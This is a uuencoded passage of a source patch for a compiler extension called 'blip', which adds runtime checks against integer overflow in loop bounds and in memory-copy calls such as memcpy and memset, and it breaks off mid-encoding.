+M#0T**R-I;F-L=61E(")S>7-T96TN:"(-#0HK(VEN8VQU9&4@(FUA8VAM;V1E
+M+F@B#0T**R-I;F-L=61E(")R=&PN:"(-#0HK(VEN8VQU9&4@(G1R964N:"(-
+M#0HK(VEN8VQU9&4@(G1O<&QE=BYH(@T-"BLC:6YC;'5D92`B8FQI<"YH(@T-
+M"BLC:6YC;'5D92`B9FQA9W,N:"(-#0HK(VEN8VQU9&4@(F,M8V]M;6]N+F@B
+M#0T**PT-"BLO*B!T:&ES('-T<G5C="!W:6QL(&AE;'`@86QL(&-H96-K7VQO
+M;W!?;&EM:70@9G5N8W1I;VYT:6]N#0T**R`J('1O(&-O;6UU;FET8V%T92X-
+M#0HK("H@4VEN8V4@=&AE(&-O;7!I;&5R(&ES('-I;F=L92!T:')E860L(&%N
+M9"!T:&4@8FQI<"!C:&5C:W,@87)E(&%L;'=A>7,@#0T**R`J('-T871L97-S
+M+"!T:&%N(&ET<R!S869E('1O('5S92!T:&ES('-T<G5C="!A<R!G;&]B86P@
+M:6YS=&5A9"!O9B!P87-S:6YG#0T**R`J(&ET(&%L;"!A<F]U;F0N("HO#0T*
+M*PT-"BML;V]P7VQI;6ET7W,@;&]O<%]L:6UI=#L-#0HK#0T**R\J('-A=F4@
+M9G5N8W1I;VX@=&\@8F4@8VAE8VME9"!A9V%I;G-T(&EN=&5G97(@97AP;&]I
+M="`J+PT-"BML;V]P7VQI:V5?<R`);&]O<%]L:6ME<UM=/7L-#0HK"7LB;65M
+M8W!Y(BPR?2P-#0HK"7LB;65M;6]V92(L,GTL#0T**PE[(FUE;7-E="(L,GTL
+M#0T**PE[(FUE;6-C<'DB+#-]+`T-"BL)>R)B8V]P>2(L,GTL#0T**PE[(F)Z
+M97)O(BPQ?2P-#0HK"7LB<W=A8B(L,GTL#0T**PE[(B(L,'T)#0T**WT[#0T*
+M*PT-"BLO*B!G;&]B86P@9F]R(&)L:7`@<W1A=&ES=&EC<R`J+PT-"BMB;&EP
+M7W-T871I<W1I8W-?<R`@(&)L:7!?<W1A=#U[,"PP+#`L,"PP+#`L,"PP?3L-
+M#0HK#0T**R-D969I;F4@4$52*'@L>2D@"7D@/R`H>"`J(#$P,"DO>2`Z(#`-
+M#0HK#0T**R\J('!R:6YT(&)L:7`@<W1A=&ES=&EC<R!T;R!T:&4@<W1D97)R
+M("HO#0T**W9O:60@#0T**V)L:7!?<W1A=%]P<FEN="AF<"D-#0HK"49)3$4J
+M"69P.PT-"BM[#0T**PT-"BL):68H(69L86=?8FQI<"!\?`T-"BL)"2%F;&%G
+M7V)L:7!?<W1A="D@<F5T=7)N.PT-"BL)#0T**PEI9BAF<"`]/2`P*2`-#0HK
+M"0EF<"`]('-T9&5R<CL-#0HK"0T-"BL-#0HK"69P<FEN=&8H9G`L(EQN+3U=
+M($)L:7`@<W1A=&ES=&EC<R`H8VAE8VMS(&5M:71S*5QN(BD[#0T**PD-#0HK
+M"69P<FEN=&8H9G`L(E1O=&%L.EQT)60O)60E)5QT7'0E9"\E9"4E7&XB+`T-
+M"BL)"0EB;&EP7W-T870N=&]T86Q?8VAE8VMS+#$P,"P-#0HK"0D)8FQI<%]S
+M=&%T+G1O=&%L7V5M:71S+`T-"BL)"0E015(H8FQI<%]S=&%T+G1O=&%L7V5M
+M:71S+&)L:7!?<W1A="YT;W1A;%]C:&5C:W,I*3L)"0D-#0HK"0D)#0T**PEF
+M<')I;G1F*&9P+")F;W(Z7'0E9"\E9"4E7'1<="5D+R5D)25<;B(L#0T**PD)
+M"6)L:7!?<W1A="YF;W)?8VAE8VMS+`T-"BL)"0E015(H8FQI<%]S=&%T+F9O
+M<E]C:&5C:W,L8FQI<%]S=&%T+G1O=&%L7V-H96-K<RDL#0T**PD)"6)L:7!?
+M<W1A="YF;W)?96UI=',L#0T**PD)"5!%4BAB;&EP7W-T870N9F]R7V5M:71S
+M+&)L:7!?<W1A="YF;W)?8VAE8VMS*2D["0D)#0T**PD)"0T-"BL)9G!R:6YT
+M9BAF<"PB=VAI;&4Z7'0E9"\E9"4E7'1<="5D+R5D)25<;B(L#0T**PD)"6)L
+M:7!?<W1A="YW:&EL95]C:&5C:W,L#0T**PD)"5!%4BAB;&EP7W-T870N=VAI
+M;&5?8VAE8VMS+&)L:7!?<W1A="YT;W1A;%]C:&5C:W,I+`T-"BL)"0EB;&EP
+M7W-T870N=VAI;&5?96UI=',L#0T**PD)"5!%4BAB;&EP7W-T870N=VAI;&5?
+M96UI=',L8FQI<%]S=&%T+G=H:6QE7V-H96-K<RDI.PD)"0T-"BL)"0D-#0HK
+M"69P<FEN=&8H9G`L(F-A;&QS.EQT)60O)60E)5QT7'0E9"\E9"4E7&XB+`T-
+M"BL)"0EB;&EP7W-T870N8V%L;%]C:&5C:W,L#0T**PD)"5!%4BAB;&EP7W-T
+M870N8V%L;%]C:&5C:W,L8FQI<%]S=&%T+G1O=&%L7V-H96-K<RDL#0T**PD)
+M"6)L:7!?<W1A="YC86QL7V5M:71S+`T-"BL)"0E015(H8FQI<%]S=&%T+F-A
+M;&Q?96UI=',L8FQI<%]S=&%T+F-A;&Q?8VAE8VMS*2D["0D)#0T**PT-"BL)
+M9G!R:6YT9BAF<"PB+3U=($5N9"!";&EP(%-T871I<W1I8W-<;B(I.PT-"BM]
+M#0T**PT-"BLO*B!P<FEN="!A('=A<FYI;F<@;65S<V%G92P@;VYL>2!D;R!S
+M;R!I9B!T:&4@<FEG:'0@=V%R;FYI;F<@9FQA9R!I<R!T=7)N960@#0T**R`J
+M(&]N+B`J+PT-"BL-#0HK=F]I9`T-"BMB;&EP7W=A<FYI;F<H=V%R;E]I9"QM
+M97-S86=E*0T-"BL)96YU;2!B;&EP7W=A<FYI;F=S('=A<FY?:60[#0T**PEC
+M;VYS="!C:&%R*@EM97-S86=E.PT-"BM[#0T**PT-"BL):68H=V%R;E]I9"`]
+M/2!314Q&7T-(14-+*7L-#0HK"0ES=VET8V@H5%)%15]#3T1%("AL;V]P7VQI
+M;6ET+G-T;70I*7L-#0HK"0D)8V%S92!&3U)?4U1-5#H-#0HK"0D)"7=A<FY?
+M:60@/2!.15]&3U([#0T**PD)"0EB<F5A:SL-#0HK#0T**PD)"6-A<V4@5TA)
+M3$5?4U1-5#H-#0HK"0D)"7=A<FY?:60@/2!.15]72$E,13L-#0HK"0D)"6)R
+M96%K.PT-"BL-#0HK"0D)8V%S92!#04Q,7T584%(Z#0T**PD)"6-A<V4@041$
+M4E]%6%!2.@T-"BL)"0D)=V%R;E]I9"`]($Y%7T-!3$P[#0T**PD)"0EB<F5A
+M:SL-#0HK#0T**PD)"61E9F%U;'0Z<F5T=7)N.PT-"BL)"7T-#0HK"7T-#0HK
+M#0T**PES=VET8V@H=V%R;E]I9"E[#0T**PD)8V%S92!.15]&3U(Z#0T**PD)
+M"6EF*"%W87)N7V)L:7!?9F]R7VYO=%]E;6ET*2!R971U<FX[#0T**PD)"6)R
+M96%K.PT-"BL)"6-A<V4@3D5?5TA)3$4Z#0T**PD)"6EF*"%W87)N7V)L:7!?
+M=VAI;&5?;F]T7V5M:70I(')E='5R;CL-#0HK"0D)8G)E86L[#0T**PD)8V%S
+M92!.15]#04Q,.@T-"BL)"0EI9B@A=V%R;E]B;&EP7V-A;&Q?;F]T7V5M:70I
+M(')E='5R;CL-#0HK"0D)8G)E86L[#0T**PT-"BL)"61E9F%U;'0Z(')E='5R
+M;CL-#0HK"7T-#0HK#0T**PT-"BL)=V%R;FEN9RAM97-S86=E*3L-#0HK?0T-
+M"BL-#0HK#0T**R\J(&)U:6QD(&$@8V%L;"!T;R!T:&4@8FQI<%]V:6]L871I
+M;VX@9G5N8W1I;VXN('5S:6YG('1H92!A<F<@97AP(&%S('1H92`-#0HK("H@
+M<&%R86UE=&5R(&9O<B!T:&ES(&-A;&PN("HO#0T**PT-"BMT<F5E#0T**V)L
+M:7!?8G5I;&1?=FEO;&%T:6]N7V-A;&PH87)G*0T-"BL)=')E92!A<F<[#0T*
+M*WL-#0HK#0T**PET<F5E"7!A<F%M<SL-#0HK"71R964)97AP.PT-"BL)=')E
+M90EB;&EP7V9U;F-?9&5C;#U.54Q,.PT-"BL-#0HK"71R964)8FQI<%]V:6]L
+M871I;VY?9&5C;"`]($Y53$P[#0T**PD-#0HK"6)L:7!?=FEO;&%T:6]N7V1E
+M8VP@/0T-"BL)"6)U:6QD7V1E8VP@*$953D-424].7T1%0TPL(&=E=%]I9&5N
+M=&EF:65R*")?7V)L:7!?=FEO;&%T:6]N(BDL#0T**PD)"0EB=6EL9%]F=6YC
+M=&EO;E]T>7!E("AI;G1E9V5R7W1Y<&5?;F]D92Q.54Q,7U12144I*3L-#0HK
+M#0T**PE$14-,7T%25$E&24-)04P@*&)L:7!?=FEO;&%T:6]N7V1E8VPI(#T@
+M,3L-#0HK"41%0TQ?15A415).04P@*&)L:7!?=FEO;&%T:6]N7V1E8VPI(#T@
+M,3L-#0HK"41%0TQ?24Y,24Y%("AB;&EP7W9I;VQA=&EO;E]D96-L*2`](#`[
+M#0T**PE44D5%7U!50DQ)0R`H8FQI<%]V:6]L871I;VY?9&5C;"D@/2`Q.PT-
+M"BL)#0T**PEB;&EP7V9U;F-?9&5C;"`](&)L:7!?=FEO;&%T:6]N7V1E8VP[
+M#0T**PT-"BL)<&%R86US("`]('1R965?8V]N<R`H3E5,3"QA<F<L3E5,3"D[
+M#0T**PEI9B@A<&%R86US*2!R971U<FX@3E5,3#L-#0HK"0T-"BL)+RH@8VAE
+M8VL@:68@9G5N8W1I;VX@9&5C;"XN*B\)#0T**PEI9BA44D5%7T-/1$4@*&)L
+M:7!?9G5N8U]D96-L*2`A/2!&54Y#5$E/3E]$14-,*7L-#0HK"0ER971U<FX@
+M3E5,3#L-#0HK"7T-#0HK"0D)#0T**PEE>'`@/2!B=6EL9%]F=6YC=&EO;E]C
+M86QL*&)L:7!?9G5N8U]D96-L+'!A<F%M<RD[#0T**PD-#0HK"7)E='5R;B!E
+M>'`[#0T**WT-#0HK#0T**R\J(`E#<F5A=&4@82!C:&5C:R!E>'`@9F]R('1H
+M92!B;&EP(&-O;F1I=&EO;B!T:&4@97AP('=I;&P@8F4@;V8@0T].1%]%6%!2
+M(`T-"BL@*B`)='EP92P@86YD('=I;&P@:&%V92!T:&4@9F]L;&]W:6YG(&9O
+M<FUA=#H-#0HK("H@"2@H;W`Q(#X@;W`R*2`F)B`H*&]P,2UO<#(I(#X@;6%X
+M7VQI;6ET*2D@(#\@8FQI<%]V:6]L871I;VXH*2`Z(&5X<#L@(`T-"BL@*@T-
+M"BL@*B`)=VAE<F4@;W`Q+V]P,B!A<F4@8V]U;F0@86YD(&QI;6ET+"!A;F0@
+M=&AE:7(@;W)D97(@:6X@=&AE(&5X<&5R<W-I;VX@:7,-#0HK("H@"2!D969I
+M;F1E9"!B>2!T:&4@9&ER96-T:6]N(&]F('1H92!L;V]P(`T-"BL@*@T-"BL@
+M*B`)($%S(&$@;F]T92P@:2!C;W5L9"!H879E(&%D9"!S;VUE(&5X=')A(&QO
+M9VEC('1O(&5L:6UI;F%T92!T:&4@8V]M<&QE>"`-#0HK("H@"2!C:&5C:R!I
+M9B!T:&4@;&EM:70O8V]U;G0@87)E(&-O;G-T86YT<RP@8G5T('-I;F-E('1H
+M92!O<'1I;6EZ97(@8V%N(`T-"BL@*B`)('!I8VL@=&AA="!U<"!I="!W:6QL
+M(&)E(')E9'5N9&%N="!A;F0@82!S;W5R8V4@;V8@;6ES=&%K97,N*B\-#0HK
+M#0T**W1R964-#0HK8FQI<%]B=6EL9%]C:&5C:U]E>'`H97AP*0T-"BL)=')E
+M90EE>'`[#0T**WL-#0HK#0T**PET<F5E"71T(#T@=F]I9%]T>7!E7VYO9&4[
+M#0T**PET<F5E"6]P7W1T.PT-"BL)=')E90EB;&EP7W9I;VQA=&EO;E]C86QL
+M+&)L:7!?;6%X.PT-"BL)#0T**PDO*B!A;&P@97AP<F5S<VEO;B!N965D960@
+M9F]R('1H92!C;VYD=&EO;B!C<F5A=&EO;B`J+PT-"BL-#0HK"71R964@("`@
+M;W!?9W1?;6%X.PD)+RH@;W`@/B!M87@@*B\)#0T**PET<F5E"6]P,5]G=%]O
+M<#([(`DO*B`H;W`Q(#X@;W`R*2`J+PT-"BL)=')E90EM:6YU<SL@"0D)+RH@
+M*&]P,2UO<#(I("HO#0T**PET<F5E"6UI;G5S7V=T7VUA>#L@"2\J("@H;W`Q
+M+6]P,BD@/B!M87A?;&EM:70I("HO#0T**PET<F5E"71?86YD:68[(`D)+RH@
+M=&AE("@I)B8H*2`J+PT-"BL-#0HK"71R964)8V]U;G0["0D)+RH@=&AE(&-A
+M;&-U;&%T960@8V]U;G0@;&]O<"`J+PD-#0HK"71R964)8V]N9%]T97-T.PD)
+M+RH@=&AE(&-O;F1I=&EO;B!T97-T("HO#0T**PET<F5E"6-O;F1?97AP.PD)
+M+RH@5&AE('=H;VQE(&)L:7`@8V]N9&ET:6]N("HO#0T**PD-#0HK"6EF*&5X
+M<"D)='0@/2!44D5%7U194$4@*&5X<"D[#0T**PD)#0T**PEO<%]T="`](&QO
+M;F=?=6YS:6=N961?='EP95]N;V1E.PT-"BL-#0HK"6)L:7!?;6%X(#T@8G5I
+M;&1?:6YT7S(@*$),25!?34%8+#`I.PT-"BL)5%)%15]465!%("AB;&EP7VUA
+M>"D@/2!O<%]T=#L-#0HK#0T**PT-"BL)+RH@:68@;&]O<"!C;W5N=&5R(&]R
+M(&QO;W`@;&EM:70@87)E('-M86QL97(@=&AE;B`T8GET92!I;G1S(`T-"BL)
+M("H@9&]N="!E=F5N(&)O=&AE<B!T;R!C<F5A=&4@8VAE8VL@97AP<F5S<VEO
+M;BX@*B\-#0HK"6EF*"%44D5%7U194$4H;&]O<%]L:6UI="YC;W5N=&5R*2!\
+M?`T-"BL)"5194$5?4%)%0TE324].*%12145?5%E012AL;V]P7VQI;6ET+F-O
+M=6YT97(I*2`\(#,R('Q\#0T**PD)(512145?5%E012AL;V]P7VQI;6ET+FQI
+M;6ET*2!\?`T-"BL)"5194$5?4%)%0TE324].*%12145?5%E012AL;V]P7VQI
+M;6ET+FQI;6ET*2D@/"`S,BE[#0T**PD)#0T**PD)8FQI<%]W87)N:6YG*%-%
+M3$9?0TA%0TLL(F)L:7`Z('9A<B!S;6%L;&5R('1H96X@;&]N9R(I.PD-#0HK
+M"0ER971U<FX@3E5,3#L-#0HK"7T-#0HK"0T-"BL)<W=I=&-H*%12145?0T]$
+M12`H;&]O<%]L:6UI="YS=&UT*2E["0T-"BL-#0HK"6-A<V4@5TA)3$5?4U1-
+M5#H-#0HK"6-A<V4@1D]27U-4350Z#0T**PT-"BL)"0T-"BL)"2\J(&EN(&QO
+M;W`@;V8@='EP92!W:&EL92AL96XM+2D@9V-C(&9O<B!S;VUE(')E87-O;B!P
+M<F5F97(@=&\@8V]M<&%R92`-#0HK"0D@*B!T:&4@<F5S=6QT(&]F(")L96XM
+M+2(@=&\@82!V86QU92!I;G-T96%D(&]F(&-O;7!A<FEN9R`B;&5N(BX@#0T*
+M*PD)("H@*'1O('-A=F4@<F5G:7-T97)S('=H:6-H(&]L9"!L96X_*2!T:&4@
+M<F5S=6QT(&ES('1H870@9V-C(&%S<W5M92`-#0HK"0D@*B!T:&%T(#`@+2T@
+M=VEL;"!B96-O;64@,'AF9F9F9F9F9B!E=F5N(&EF('1H92!L;V]P(&ES('5N
+M<VEG;F5D("$A+@T-"BL)"2`J(%1O(')E<')E<V5N="!T:&4@<F5A;"!D:7-T
+M86YC92!W92!W:6QL(&-H86YG92!T:&ES('9A;'5E('1O(#`N("HO#0T**PD)
+M:68H;&]O<%]L:6UI="YD:7(@/3T@1$5#4D5-14Y4("8F#0T**PD)"512145?
+M0T].4U1!3E0H;&]O<%]L:6UI="YL:6UI="D@)B8-#0HK"0D)5%)%15])3E1?
+M0U-47TQ/5RAL;V]P7VQI;6ET+FQI;6ET*2`]/2`P>$9&1D9&1D9&*7L-#0HK
+M"0D);&]O<%]L:6UI="YL:6UI="`](&EN=&5G97)?>F5R;U]N;V1E.PD)#0T*
+M*PD)?0T-"BL)#0T**PD-#0HK"0DO*B!C;VYV97)T('1H92!L:6UI="!A;F0@
+M8V]U;G0@:6YT;R!U;G-I9VYE9"!I;G0@:68@=&AE>2!A<F4@;F]T(`T-"BL)
+M"2`J(&%L;')E861Y('-O+B!4:&ES(&-O;G9E<G1I;VX@:7,@;F]T('-U<'!O
+M<V4@=&\@969F96-T('1H92!R96%L(`T-"BL)"2`J('9A<G,N+B`Z*2`J+PT-
+M"BL)"6EF*"%44D5%7U5.4TE'3D5$*&QO;W!?;&EM:70N8V]U;G1E<BD@)B8-
+M#0HK"0D)(512145?0T].4U1!3E0H;&]O<%]L:6UI="YC;W5N=&5R*2E[#0T*
+M*PD)"6QO;W!?;&EM:70N8V]U;G1E<B`](&)U:6QD,2`H0T].5D525%]%6%!2
+M+&QO;F=?=6YS:6=N961?='EP95]N;V1E+`T-"BL)"0D)"0D)"0D);&]O<%]L
+M:6UI="YC;W5N=&5R*3L-#0HK"0E]#0T**PD)#0T**PD):68H(512145?54Y3
+M24=.140H;&]O<%]L:6UI="YL:6UI="D@)B8-#0HK"0D)(512145?0T].4U1!
+M3E0H;&]O<%]L:6UI="YL:6UI="DI>PT-"BL)"0EL;V]P7VQI;6ET+FQI;6ET
+M(#T@8G5I;&0Q("A#3TY615)47T584%(L;&]N9U]U;G-I9VYE9%]T>7!E7VYO
+M9&4L#0T**PD)"0D)"0D)"0EL;V]P7VQI;6ET+FQI;6ET*3L-#0HK"0E]#0T*
+M*PD)#0T**PD)#0T**PD)+RH@8V]N<W1R=6-T('1H92!C:&5C:R!E>'!R97-S
+M:6]N<R!D97!E;F1I;F<@;VX@;&]O<"!D:7)E8W1I;VX@*B\-#0HK"0EI9BAL
+M;V]P7VQI;6ET+F1I<B`]/2!)3D-214U%3E0I>PT-"BL)"0EM:6YU<R`](&)U
+M:6QD("A-24Y54U]%6%!2+&]P7W1T+`T-"BL)"0D)"0D);&]O<%]L:6UI="YL
+M:6UI="QL;V]P7VQI;6ET+F-O=6YT97(I.PT-"BL)#0T**PD)"6]P,5]G=%]O
+M<#(@/2!B=6EL9"`H1U1?15A04BQB;V]L96%N7W1Y<&5?;F]D92P-#0HK"0D)
+M"0D)"0EL;V]P7VQI;6ET+FQI;6ET+&QO;W!?;&EM:70N8V]U;G1E<BD[#0T*
+M*PD)?0T-"BL)"65L<V5[#0T**PD)"6UI;G5S(#T@8G5I;&0@*$U)3E537T58
+M4%(L;W!?='0L#0T**PD)"0D)"0EL;V]P7VQI;6ET+F-O=6YT97(L;&]O<%]L
+M:6UI="YL:6UI="D[#0T**PD)"0T-"BL)"0EO<#%?9W1?;W`R(#T@8G5I;&0@
+M*$=47T584%(L8F]O;&5A;E]T>7!E7VYO9&4L#0T**PD)"0D)"0D);&]O<%]L
+M:6UI="YC;W5N=&5R+&QO;W!?;&EM:70N;&EM:70I.PT-"BL)"7T)#0T**PD-
+M#0HK"0DO*B!I9B!A;GD@;V8@=&AE(&5X<')E<W-I;VYS('=A<R!N;W0@8W)E
+M871E9"P@9F%I;"`J+PT-"BL)"6EF*"%M:6YU<R!\?"`A;W`Q7V=T7V]P,BD@
+M<F5T=7)N($Y53$P[#0T**PD-#0HK"0EM:6YU<U]G=%]M87@@/2!B=6EL9"`H
+M1U1?15A04BQB;V]L96%N7W1Y<&5?;F]D92QM:6YU<RQB;&EP7VUA>"D[#0T*
+M*PD):68H(6UI;G5S7V=T7VUA>"D@<F5T=7)N($Y53$P[#0T**PD)#0T**PD)
+M=%]A;F1I9B`](&)U:6QD("A44E542%]!3D1)1E]%6%!2+&)O;VQE86Y?='EP
+M95]N;V1E+`T-"BL)"0D)"0EO<#%?9W1?;W`R+&UI;G5S7V=T7VUA>"D[#0T*
+M*PD-#0HK"0EI9B@A=%]A;F1I9BD@<F5T=7)N($Y53$P[#0T**PD)#0T**PD)
+M8V]N9%]T97-T(#T@=%]A;F1I9CL-#0HK"0EC;W5N="`](&UI;G5S.PD-#0HK
+M"0D-#0HK"0EB<F5A:SL-#0HK"0T-"BL)8V%S92!#04Q,7T584%(Z#0T**PT-
+M"BL)"6EF*%12145?54Y324=.140H;&]O<%]L:6UI="YL:6UI="D@)B8-#0HK
+M"0D)(512145?0T].4U1!3E0H;&]O<%]L:6UI="YL:6UI="DI>PT-"BL)"0EL
+M;V]P7VQI;6ET+FQI;6ET(#T@8G5I;&0Q("A#3TY615)47T584%(L;&]N9U]U
+M;G-I9VYE9%]T>7!E7VYO9&4L#0T**PD)"0D)"0D)"0EL;V]P7VQI;6ET+FQI
+M;6ET*3L-#0HK"0E]#0T**PT-"BL)"6]P7V=T7VUA>"`](&)U:6QD("A'5%]%
+M6%!2+&)O;VQE86Y?='EP95]N;V1E+&QO;W!?;&EM:70N;&EM:70L8FQI<%]M
+M87@I.PT-"BL)"6EF*"%O<%]G=%]M87@I(')E='5R;B!.54Q,.PT-"BL-#0HK
+M"0EC;VYD7W1E<W0@/2!O<%]G=%]M87@[#0T**PD)8V]U;G0@/2!L;V]P7VQI
+M;6ET+FQI;6ET.PT-"BL)"0T-"BL)"6)R96%K.PT-"BL-#0HK"61E9F%U;'0Z
+M<F5T=7)N($Y53$P["0T-"BL)?0T-"BL)"0T-"BL)8FQI<%]V:6]L871I;VY?
+M8V%L;"`](&)L:7!?8G5I;&1?=FEO;&%T:6]N7V-A;&PH8V]U;G0I.PT-"BL)
+M:68H(6)L:7!?=FEO;&%T:6]N7V-A;&PI(')E='5R;B!.54Q,.PT-"BL)#0T*
+M*PDO*B!N;W<@=V4@=VEL;"!B=6EL9"!T:&4@0T].1%]%6%!2('5S:6YG('1H
+M92!G="!A<R!T:&4@8V]N9&ET:6]N#0T**PD@*B!A(&-A;&P@=&\@;W5R(&)L
+M:7!?=FEO;&%T:6]N(&9U;F-T:6]N(&EF(&-O;F1I=&EO;B!I<R!T<G5E+"!A
+M;F0@#0T**PD@*B!T:&4@87)G(")E>'`B(&%S(&9A;'-E(&5X<"!O9B!T:&4@
+M0T].1%]%6%!2("HO#0T**PEC;VYD7V5X<"`](&)U:6QD("A#3TY$7T584%(L
+M='0L8V]N9%]T97-T+&)L:7!?=FEO;&%T:6]N7V-A;&PL#0T**PD)"0D@97AP
+M(#\@97AP(#H@:6YT96=E<E]Z97)O7VYO9&4I.PT-"BL-#0HK"7)E='5R;B!C
+M;VYD7V5X<#L-#0HK?0T-"BL-#0HK#0T**R\J($-R96%T92!A;B!%6%!27U-4
+M350@=VET:"!A($-/3D1?15A04B!I;G-I9&4L('=H:6-H(&-H96-K(&9O<B!B
+M;&EP(`T-"BL@*B!C;VYD:71I;VXN("HO#0T**PT-"BMT<F5E#0T**V)L:7!?
+M8G5I;&1?8VAE8VM?<W1M="AE>'`I#0T**PET<F5E"65X<#L-#0HK>PT-"BL-
+M#0HK"71R964)8VAE8VM?<W1M=#TP.PT-"BL)=')E90EC:&5C:U]E>'`],#L-
+M#0HK#0T**PEC:&5C:U]E>'`@/2!B;&EP7V)U:6QD7V-H96-K7V5X<"AE>'`I
+M.PT-"BL):68H(6-H96-K7V5X<"D@<F5T=7)N($Y53$P[#0T**PD-#0HK"6-H
+M96-K7W-T;70@/2!B=6EL9%]S=&UT*$584%)?4U1-5"P@8VAE8VM?97AP*3L-
+M#0HK#0T**PER971U<FX@8VAE8VM?<W1M=#L-#0HK?0T-"BL-#0HK#0T**R\J
+M"6%D9"!A($-/3D1?15A04B!T;R!T:&4@9F]R(&EN:70@<W1M="X@5&AE(&%D
+M9&ET:6]N(&-H96-K('=I;&P@8F4@:6X@80T-"BL@*@EF;W)M870@;V8@82!N
+M97<@15A04E]35$U4(&)Y(&UA:VEN9R!T:&4@8W5R<F5N="!F;W(@:6YI="!S
+M=&UT(&$@#0T**R`J"4-/35!/54Y$7U-4350@86YD(&-H86EN9R!T:&4@;F5W
+M($584%)?4U1-5"!A="!T:&4@96YD(&]F('1H92!E>&ES=&EN9R!O;F4N(`T-
+M"BL@*B\-#0HK(`T-"BMB;V]L("`-#0HK8FQI<%]E;6ET7V9O<E]L;V]P7V-H
+M96-K<RAF;W)?<W1M="D-#0HK"71R964)9F]R7W-T;70[#0T**PD)#0T**WL-
+M#0HK#0T**PET<F5E"69O<E]I;FET.PT-"BL)=')E90EC;VUP;W5N9%]E>'!R
+M.PT-"BL)=')E90EB;&EP7V5X<#L-#0HK#0T**PEF;W)?:6YI="`]($9/4E])
+M3DE47U-4350@*&9O<E]S=&UT*3L-#0HK#0T**PDO*B!(86YD;&4@;VYL>2!C
+M87-E<R!W:&5R92!F;W(@:6YI="!I<R!E>'!R97-S:6]N+B`J+PT-"BL):68H
+M5%)%15]#3T1%("AF;W)?:6YI="D@(3T@15A04E]35$U4*2![#0T**PD)8FQI
+M<%]W87)N:6YG*$Y%7T9/4BP-#0HK"0D)(F)L:7`Z(&9O<B!I;FET(&ES(&YO
+M="!%6%!27U-4350B*3L)#0T**PD)<F5T=7)N(&9A;'-E.PT-"BL)?0T-"BL)
+M#0T**PDO*B!B=6EL9"!A(&)L:7`@8VAE8VL@=7-I;F<@=&AE(&=L;V)A;"!L
+M;V]P7VQI;6ET("HO#0T**PEB;&EP7V5X<"`](&)L:7!?8G5I;&1?8VAE8VM?
+M97AP*$Y53$Q?5%)%12D[#0T**PEI9B@A8FQI<%]E>'`I>PT-"BL)"6)L:7!?
+M=V%R;FEN9RA.15]&3U(L#0T**PD)"2)B;&EP.B!I;G1E<FYA;"!F86EL=7)E
+M('=H:6QE(&)U:6QD:6YG(&-H96-K(&5X<')E<W-I;VXB*3L)#0T**PD)<F5T
+M=7)N(&9A;'-E.PT-"BL)?0T-"BL-#0HK"6EF*%12145?3U!%4D%.1"`H9F]R
+M7VEN:70L,"D@/3T@3E5,3%]44D5%*7L-#0HK"0E44D5%7T]015)!3D0@*&9O
+M<E]I;FET+#`I(#T@8FQI<%]E>'`[#0T**PE]#0T**PEE;'-E>PT-"BL)"2\J
+M(&-O;G-T<F%C="!A(&YE=R!C;VUP;W5N9"!E>'!R97-S:6]N("HO#0T**PD)
+M8V]M<&]U;F1?97AP<B`](&)U:6QD*$-/35!/54Y$7T584%(L=F]I9%]T>7!E
+M7VYO9&4L#0T**PD)"0D)"0D)5%)%15]/4$5204Y$("AF;W)?:6YI="PP*2P-
+M#0HK"0D)"0D)"0EB;&EP7V5X<"D[#0T**PD-#0HK"0EI9B@A8V]M<&]U;F1?
+M97AP<BD@<F5T=7)N(&9A;'-E.PT-"BL)#0T**PD)+RH@<F5P;&%C92!C=7)R
+M96YT(&9O<B!I;FET(&5X<')E<W-I;VX@=VET:"!T:&4@;F5W(&-O;7!O=6YD
+M(`T-"BL)"2`J(&5X<')E<W-I;VX@*B\-#0HK"0D-#0HK"0E44D5%7T]015)!
+M3D0@*&9O<E]I;FET+#`I(#T@8V]M<&]U;F1?97AP<CL-#0HK"7T-#0HK"0T-
+M"BL)<F5T=7)N('1R=64[#0T**PD-#0HK?0T-"BL-#0HK+RH)861D(&$@0T].
+M1%]%6%!2(&)E9F]R92!T:&4@5TA)3$5?4U1-5"X@5&AE(&%D9&ET:6]N(&-H
+M96-K('=I;&P@8F4@:6X@80T-"BL@*@EF;W)M870@;V8@82!N97<@15A04E]3
+M5$U4+B!3:6YC92!W92!A<F4@8V%L;&5D(&EN(&$@<W1A=&4@=VAE<F4@=&AE
+M(`T-"BL@*@E72$E,15]35$U4('=A<R!N;W0@>65T(&%D9&5D('1O('1H92!T
+M<F5E+B!W92!W:6QL('-I;7!L>2!A9&0@;W5R(&-O;F0N(`T-"BL@*B\-#0HK
+M(`T-"BMB;V]L("`-#0HK8FQI<%]E;6ET7W=H:6QE7VQO;W!?8VAE8VMS*"D-
+M#0HK>PT-"BL)=')E90EB;&EP7W-T;70[#0T**PD)#0T**PEB;&EP7W-T;70@
+M/2!B;&EP7V)U:6QD7V-H96-K7W-T;70H3E5,3%]44D5%*3L-#0HK"6EF*"%B
+M;&EP7W-T;70I(')E='5R;B!F86QS93L-#0HK"0T-"BL)861D7W-T;70H8FQI
+M<%]S=&UT*3L-#0HK"0T-"BL)<F5T=7)N('1R=64[#0T**WT-#0HK#0T**PT-
+M"BLO*B!C;VYV97)T(&$@0T%,3%]%6%!2('1O(&$@0T].1%]%6%!2(&AA=FEN
+M9R!T:&4@8FQI<"!C:&5C:W,@87,@=&AE(&-O;F0N#0T**R`J(&%N9"!T:&4@
+M;W)I9VEN86P@0T%,3%]%6%!2(&%S('1H92!F86QS92!S:61E(&]F('1H92!E
+M>'!R97-S:6]N+B`J+R`-#0HK#0T**W1R964@(`T-"BMB;&EP7V5M:71?8V%L
+M;%]C:&5C:W,H8V%L;"D-#0HK"71R964)8V%L;#L-#0HK"0D-#0HK>PT-"BL)
+M=')E90EC:&5C:U]E>'`[#0T**PT-"BL)8VAE8VM?97AP(#T@8FQI<%]B=6EL
+M9%]C:&5C:U]E>'`H8V%L;"D[(`T-"BL-#0HK"2\J(&EF('=E(&9A:6QE9"!T
+M;R!C;VYV97)T('1H92!E>'`@:6YT;R!O=7(@8VAE8VLL(`T-"BL)("H@=&AE
+M;B!R971U<FX@=&AE(&]R:6=I;F%L(&5X<'(@*B\-#0HK"6EF*"%C:&5C:U]E
+M>'`I(')E='5R;B!C86QL.PT-"BL-#0HK"7)E='5R;B!C:&5C:U]E>'`[#0T*
+M*WT-#0HK#0T**R\J(&-H96-K(&EF(&$@9&5C;"!I<R!P87)T(&]F(&$@<W1M
+M="!O<B!A;B!E>'!R(&%S(&$@;'9A;'5E#0T**R`J(&EF(&ET(&ES('1H96X@
